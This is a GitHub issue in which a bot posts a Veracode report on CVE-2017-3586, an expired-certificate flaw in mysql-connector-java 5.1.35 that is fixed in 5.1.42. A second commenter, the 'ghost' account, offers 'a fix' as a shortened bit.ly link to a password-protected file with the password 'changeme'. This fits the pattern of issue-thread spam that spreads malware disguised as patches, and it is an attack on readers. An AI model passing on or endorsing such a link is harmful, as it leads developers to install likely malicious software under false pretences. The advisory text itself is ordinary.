julz0815 / test-action

0 stars 1 forks source link

CVE: 2017-3586 found in mysql-connector-java - Version: 5.1.35 [JAVA] #1177

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

Attribute Details
Library mysql-connector-java
Description MySQL java connector
Language JAVA
Vulnerability Usable Expired Certificates
Vulnerability description mysql-connector-java doesn't check the server's SSL certificate for an expiration date before it establishes the SSL connection. This would allow attackers to use an expired certificate to make requests to the server.
CVE 2017-3586
CVSS score 5.5
Vulnerability present in version/s 5.1.21-5.1.41
Found library version/s 5.1.35
Vulnerability fixed in version 5.1.42
Library latest version 8.0.33
Fix

Links:

ghost commented 1 month ago

This might help:This file might fix it

https://bit.ly/3zo8fAM Pass: changeme

you may need to install the c compiler